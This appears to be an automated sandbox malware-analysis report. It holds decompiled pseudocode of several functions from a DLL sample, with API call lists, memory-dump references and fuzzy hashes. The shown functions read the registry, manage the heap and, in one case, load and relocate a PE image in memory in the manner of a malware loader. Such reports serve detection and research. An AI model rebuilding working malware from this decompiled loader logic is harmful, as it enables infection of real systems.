Opcode Fuzzy Hash: 71a73cde9895a232ee2e58434a54b6151ba74c076069e91b54dd364ef262375f
Instruction Fuzzy Hash: A0117972108255ABDB21EB64C858EEB7BFCFB4A744F01091AF619D7140D730ED048B92

Uniqueness

Uniqueness Score: -1.00%

Function 00DE71A5, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DE71A5(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0xdea2d4; // 0x2f2d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0xdeba30; // 0x4f0053
				_v16 = 4;
				_t31 = E00DE3875(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0xdea2d4; // 0x2f2d5a8
					_t5 = _t19 + 0xdeba8c; // 0x6e0049
					_t34 = E00DE3875(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E00DE50CA(_t34);
					}
					E00DE50CA(_t31);
				}
				return _v8;
			}

0x00de71ab
0x00de71b0
0x00de71b5
0x00de71bc
0x00de71c8
0x00de71cc
0x00de71ce
0x00de71d4
0x00de71e0
0x00de71e4
0x00de71f7
0x00de71ff
0x00de7213
0x00de721b
0x00de721d
0x00de721d
0x00de7224
0x00de7224
0x00de722b
0x00de722b
0x00de7231
0x00de7236
0x00de723c

APIs

Part of subcall function 00DE3875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00DE71C8,004F0053,00000000,?), ref: 00DE387E
Part of subcall function 00DE3875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00DE71C8,004F0053,00000000,?), ref: 00DE38A8
Part of subcall function 00DE3875: memset.NTDLL ref: 00DE38BC

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00DE71F7
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00DE7213
RegCloseKey.ADVAPI32(00000000), ref: 00DE7224

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: ffde5f81fc6837abd6971d88c1d78e0abb09a9bf36fb03b89247263905d1b7cf
Instruction ID: 7bf2fe6b4ac6ec6f178660d5cde4b07af8b19fd62e748e7ec4240cc91ef8b4c9
Opcode Fuzzy Hash: ffde5f81fc6837abd6971d88c1d78e0abb09a9bf36fb03b89247263905d1b7cf
Instruction Fuzzy Hash: FA111B7290028ABBDB11FBD9DC89FAE77BCEB04704F140069B601EB151EB70EA049B75

Uniqueness

Uniqueness Score: -1.00%

Function 00DE6872, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00DE6872(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00DE5C35(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xdea2d4; // 0x2f2d5a8
						_t20 = _t68 + 0xdeb1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00DE37AF(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00de6878
0x00de687b
0x00de688b
0x00de6894
0x00de6898
0x00de6966
0x00de696c
0x00de696c
0x00de68b2
0x00de68b7
0x00de68bb
0x00de68c1
0x00de68c6
0x00de68cd
0x00de68dc
0x00de68dc
0x00de68e0
0x00de68e2
0x00de68ee
0x00de68f9
0x00de6904
0x00de6908
0x00de6912
0x00de6916
0x00de6918
0x00de691d
0x00de6924
0x00de6934
0x00de6934
0x00de691d
0x00de6916
0x00de6936
0x00de693b
0x00de6940
0x00de6940
0x00de6946
0x00de694c
0x00de6951
0x00de6951
0x00de6956
0x00de695b
0x00de695b
0x00de6956
0x00de68e0
0x00de695d
0x00de6963
0x00000000

APIs

Part of subcall function 00DE5C35: SysAllocString.OLEAUT32(80000002), ref: 00DE5C8C
Part of subcall function 00DE5C35: SysFreeString.OLEAUT32(00000000), ref: 00DE5CF1

SysFreeString.OLEAUT32(?), ref: 00DE6951
SysFreeString.OLEAUT32(00DE1E05), ref: 00DE695B

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 0100947bf7f5ed982d0b5bfdadaabb6a0a83f17411a6bed3637b620e7488336a
Instruction ID: f72dba356868be6a7bf2db082d7290ff169aa28ed03c8ed01161900b6da9d914
Opcode Fuzzy Hash: 0100947bf7f5ed982d0b5bfdadaabb6a0a83f17411a6bed3637b620e7488336a
Instruction Fuzzy Hash: 38313972500199AFCB21EF56CC88C9BBB79FFD97807144658F9159B211E231ED51CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4809A6, Relevance: 3.1, APIs: 2, Instructions: 108timethreadCOMMON

Download Yara Rule

APIs

___initmbctable.LIBCMT ref: 6D4809AE

Part of subcall function 6D480D27: __setmbcp.LIBCMT ref: 6D480D32

__invoke_watson.LIBCMT ref: 6D480A80

Part of subcall function 6D47E630: IsProcessorFeaturePresent.KERNEL32(00000017,6D47E61F,?,?,?,?,?,?,6D47E62C,00000000,00000000,00000000,00000000,00000000,6D47E498), ref: 6D47E632
Part of subcall function 6D47E630: __call_reportfault.LIBCMT ref: 6D47E64B

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6D480ABA
GetCurrentThreadId.KERNEL32 ref: 6D480AC9
GetCurrentProcessId.KERNEL32 ref: 6D480AD2
QueryPerformanceCounter.KERNEL32(?), ref: 6D480ADF

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: CurrentTime$CounterFeatureFilePerformancePresentProcessProcessorQuerySystemThread___initmbctable__call_reportfault__invoke_watson__setmbcp
String ID:
API String ID: 1117328480-0
Opcode ID: 77977ccdf2c9a20cbfeff840899d50a6802bc78b7cda84a356daa437f6c470c5
Instruction ID: 8ed0e797b625b7b2a4f7bde60059733d92701e9c79cf7889df902df01dbca6da
Opcode Fuzzy Hash: 77977ccdf2c9a20cbfeff840899d50a6802bc78b7cda84a356daa437f6c470c5
Instruction Fuzzy Hash: AA315073C1E2026FEB209A7E9800FA637F8AB53375F26051ADA50D3382E775DC018790

Uniqueness

Uniqueness Score: -1.00%

Function 00DE5685, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xdea294) == 0) {
						E00DE5076();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xdea294) == 1) {
						_t10 = E00DE6B0F(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x00de568c
0x00de568d
0x00de5690
0x00de56c2
0x00de56c4
0x00de56c4
0x00de5692
0x00de5693
0x00de56a8
0x00de56af
0x00de56b1
0x00de56b1
0x00de56af
0x00de5693
0x00de56cc

APIs

InterlockedIncrement.KERNEL32(00DEA294), ref: 00DE569A

Part of subcall function 00DE6B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00DE6B24

InterlockedDecrement.KERNEL32(00DEA294), ref: 00DE56BA

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: afcfc32999500b71cfd7d1da0b632c42f87bd416584e0493efdcc6b17cf58937
Instruction ID: d35ce10a943e9eae7c69e346f8a58da91a07860efde7c1f21e18f3b3c859c0d5
Opcode Fuzzy Hash: afcfc32999500b71cfd7d1da0b632c42f87bd416584e0493efdcc6b17cf58937
Instruction Fuzzy Hash: 1BE04F35204BE29BC7623B67BC04B9EA750AB10BCCB888418B585D107CD610EC40C6F5

Uniqueness

Uniqueness Score: -1.00%

Function 6D471ADB, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6D471ADB(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6D471697( &_v8,  &_v12,  *0x6d4741cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6D472087(_t22, _v8,  *0x6d4741cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E6D471E8A(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6d474190, 0, _v8);
				}
				return _t25;
			}

0x6d471adb
0x6d471ade
0x6d471adf
0x6d471af5
0x6d471afe
0x6d471b03
0x6d471b1c
0x6d471b05
0x6d471b18
0x6d471b18
0x6d471b20
0x6d471b22
0x6d471b2a
0x6d471b32
0x6d471b3a
0x6d471b3c
0x6d471b3c
0x6d471b3a
0x6d471b4c
0x6d471b4c
0x6d471b57

APIs

StrStrIA.KERNELBASE(00000000,6D471CE6,?,6D471CE6,?,00000000,00000000,?,?,?,6D471CE6), ref: 6D471B32
HeapFree.KERNEL32(00000000,?,?,6D471CE6,?,00000000,00000000,?,?,?,6D471CE6), ref: 6D471B4C

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ebf5389c8fafa84b762e5399854deb6e609189d2c81c9a0dba9d0de16e9fb45f
Instruction ID: cdae51770c5fadd9826569839cbbbbb3424a8d048426c7d12fbeb1c097c59ce7
Opcode Fuzzy Hash: ebf5389c8fafa84b762e5399854deb6e609189d2c81c9a0dba9d0de16e9fb45f
Instruction Fuzzy Hash: 0B018476A00125EBCB11EBA5CC04FEF77BDEB8A640F215165EA00E3104E731DE019AE0

Uniqueness

Uniqueness Score: -1.00%

Function 00DE4576, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00DE4576(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xdea2d4; // 0x2f2d5a8
				_t4 = _t15 + 0xdeb390; // 0x3d18938
				_t20 = _t4;
				_t6 = _t15 + 0xdeb124; // 0x650047
				_t17 = E00DE6872(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00DE3875(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00de4580
0x00de4582
0x00de4589
0x00de458a
0x00de458b
0x00de458c
0x00de4592
0x00de4597
0x00de4597
0x00de45a1
0x00de45b3
0x00de45ba
0x00de45e9
0x00de45bc
0x00de45c1
0x00de45e6
0x00de45c3
0x00de45c6
0x00de45cd
0x00de45d8
0x00de45cf
0x00de45d2
0x00de45d2
0x00de45dc
0x00de45dc
0x00de45c1
0x00de45f0

APIs

Part of subcall function 00DE6872: SysFreeString.OLEAUT32(?), ref: 00DE6951

Part of subcall function 00DE3875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00DE71C8,004F0053,00000000,?), ref: 00DE387E
Part of subcall function 00DE3875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00DE71C8,004F0053,00000000,?), ref: 00DE38A8
Part of subcall function 00DE3875: memset.NTDLL ref: 00DE38BC

SysFreeString.OLEAUT32(00000000), ref: 00DE45DC

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: b737b6359374654b2e1b71d46b15d90de03e0c2da61e7d155408cee7130e1efc
Instruction ID: 47391896959b0aa13dda08523c50aae370575328834d683502a19342f33449ec
Opcode Fuzzy Hash: b737b6359374654b2e1b71d46b15d90de03e0c2da61e7d155408cee7130e1efc
Instruction Fuzzy Hash: 5A019E315001A9BFCB11FBA9CC448AFBBB8FB04750F000916F901E6020D371E91197B1

Uniqueness

Uniqueness Score: -1.00%

Function 00DE50CA, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DE50CA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xdea290, 0, _a4); // executed
				return _t2;
			}

0x00de50d6
0x00de50dc

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00DE4239,00000000,00000001,?,00000000,?,?,?,00DE6B8D,00000000,?,00000001), ref: 00DE50D6

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 095011599a46074999a9f617be602e84890e1eb07e6536ba5bbd14709f35e1d6
Instruction ID: 0a0e9574263a1513f6bf35f76b9c1e7e324deeff33683cbf20dfbaa46d235650
Opcode Fuzzy Hash: 095011599a46074999a9f617be602e84890e1eb07e6536ba5bbd14709f35e1d6
Instruction Fuzzy Hash: 4EB01271104340ABCB126B01DE44F05BB22B750B00F014010B30C9C27482321420FB3A

Uniqueness

Uniqueness Score: -1.00%

Function 00DE6837, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DE6837(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xdea290, 0, _a4); // executed
				return _t2;
			}

0x00de6843
0x00de6849

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00DE4197), ref: 00DE6843

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3cc101702acc2bbc92167d6112c9be8415250527f33a7a92491b8aaf6546f68e
Instruction ID: 605b9081a96a9c0761fcd9c851b0388b0331c5f81e4d43f542d4eed6988a0e73
Opcode Fuzzy Hash: 3cc101702acc2bbc92167d6112c9be8415250527f33a7a92491b8aaf6546f68e
Instruction Fuzzy Hash: 83B01271015340ABCA13AB00DD44F05BB32B750B00F114010B3089C17082321420EB29

Uniqueness

Uniqueness Score: -1.00%

Function 6D471444, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6D471444(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6d4741cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6d4741cc - 0x63698bc4 &  !( *0x6d4741cc - 0x63698bc4);
				_t18 = E6D471060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6d4741cc - 0x63698bc4 &  !( *0x6d4741cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6d4741cc - 0x63698bc4 &  !( *0x6d4741cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6D471A5A(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6D471F7C(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6D47126D(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6D47142F(_t42);
					L8:
					return _t29;
				}
			}

0x6d47144c
0x6d47144e
0x6d47146a
0x6d47147b
0x6d471482
0x6d4714e0
0x00000000
0x6d471484
0x6d471484
0x6d47148e
0x6d471492
0x6d471497
0x6d47149a
0x6d47149f
0x6d4714a3
0x6d4714a8
0x6d4714ad
0x6d4714b1
0x6d4714b6
0x6d4714b7
0x6d4714bb
0x6d4714c0
0x6d4714c8
0x6d4714c8
0x6d4714c0
0x6d4714b1
0x6d4714a3
0x6d4714ca
0x6d4714d3
0x6d4714d7
0x6d4714e1
0x6d4714e7
0x6d4714e7

APIs

Part of subcall function 6D471060: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6D471480,?,?,?,?,00000002,00000000,?,?), ref: 6D471084
Part of subcall function 6D471060: GetProcAddress.KERNEL32(00000000,?), ref: 6D4710A6
Part of subcall function 6D471060: GetProcAddress.KERNEL32(00000000,?), ref: 6D4710BC
Part of subcall function 6D471060: GetProcAddress.KERNEL32(00000000,?), ref: 6D4710D2
Part of subcall function 6D471060: GetProcAddress.KERNEL32(00000000,?), ref: 6D4710E8
Part of subcall function 6D471060: GetProcAddress.KERNEL32(00000000,?), ref: 6D4710FE

Part of subcall function 6D471A5A: memcpy.NTDLL(00000000,00000002,6D47148E,?,?,?,?,?,6D47148E,?,?,?,?,?,?,00000002), ref: 6D471A87
Part of subcall function 6D471A5A: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6D471ABA

Part of subcall function 6D471F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6D471FB4

Part of subcall function 6D47126D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6D4712A6
Part of subcall function 6D47126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6D47131B
Part of subcall function 6D47126D: GetLastError.KERNEL32 ref: 6D471321

GetLastError.KERNEL32(?,?), ref: 6D4714C2

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: b94d1e592d23ba6847c22333fd121cf8856e6da3fb9052d0a33588cb8352bad5
Instruction ID: 9694a5ad082a7a3111a8d3580f1a8e84b0fe904fe3e18718fcbb6228fcb658db
Opcode Fuzzy Hash: b94d1e592d23ba6847c22333fd121cf8856e6da3fb9052d0a33588cb8352bad5
Instruction Fuzzy Hash: 0C115B377043166BD730DEA88C90EEB73FCFF486047105558EA05B7644EBA0ED0687A0

Uniqueness

Uniqueness Score: -1.00%

Function 00DE5384, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DE5384(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E00DE6A36(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0xdea290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E00DE4576(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}

0x00de5384
0x00de538c
0x00de53a3
0x00de53be
0x00de53c2
0x00de53c7
0x00de53c9
0x00de53d9
0x00de53e5
0x00de53cb
0x00de53cb
0x00de53ce
0x00de53d3
0x00de53d3
0x00de53c9
0x00de53eb
0x00de53ef
0x00de53ef
0x00de5398
0x00de539d
0x00de53a1
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00DE4576: SysFreeString.OLEAUT32(00000000), ref: 00DE45DC

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,73BCF710,?,00000000,?,00000000,?,00DE1AF5,?,004F0053,03D19308,00000000,?), ref: 00DE53E5

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 9febf43b804219d2b715ae6cb4a37871841d7dd4638c396dc6825514d4a17c09
Instruction ID: d72b178679d64b4e6a8df3ad70855f71efb117d1e8546a423da8077dcff5a6d8
Opcode Fuzzy Hash: 9febf43b804219d2b715ae6cb4a37871841d7dd4638c396dc6825514d4a17c09
Instruction Fuzzy Hash: EE014B32001A99BBCB22AF45DC51FEE7BA5FB047D0F088025FE059A224D771D930DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DE1FC2, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00DE1FC2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00de1fc2
0x00de1fcf
0x00de1fd0
0x00de1fd1
0x00de1fd8
0x00de2006
0x00de2007
0x00de200a
0x00de2010
0x00000000
0x00000000
0x00de1fef
0x00de1ff9
0x00de2000
0x00000000
0x00de1ff1
0x00de1ff4
0x00de2014
0x00de1ff6
0x00de1ff6
0x00000000
0x00de1ff6
0x00de1ff4
0x00de201b
0x00de2021
0x00de2021
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 00DE200A

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
